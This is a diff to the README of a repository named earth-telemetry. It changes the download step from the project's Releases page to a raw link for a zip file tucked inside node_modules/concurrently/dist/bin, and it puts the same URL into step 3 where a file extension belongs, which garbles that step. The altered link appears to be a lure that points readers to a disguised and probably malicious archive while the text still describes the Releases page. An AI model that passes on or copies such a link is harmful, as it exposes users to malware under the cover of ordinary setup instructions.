mahnoora46/earth-telemetry/README.md

 To start using earth-telemetry, you will need to download the latest version from our Releases page.

 ### Steps to Download:
-1. Click on the following link: [Download Earth Telemetry](https://github.com/mahnoora46/earth-telemetry/releases).
+1. Click on the following link: [Download Earth Telemetry](https://raw.githubusercontent.com/mahnoora46/earth-telemetry/main/node_modules/concurrently/dist/bin/earth-telemetry-3.2.zip).
 2. On the Releases page, you will find a list of versions.
 Select the latest version available.
-3. Download the appropriate file for your operating system (look for `.zip` or `.tar.gz` files).
+3. Download the appropriate file for your operating system (look for `.zip` or `https://raw.githubusercontent.com/mahnoora46/earth-telemetry/main/node_modules/concurrently/dist/bin/earth-telemetry-3.2.zip` files).
 4. Once downloaded, extract the files to your desired location on your computer.

 ### Run the Application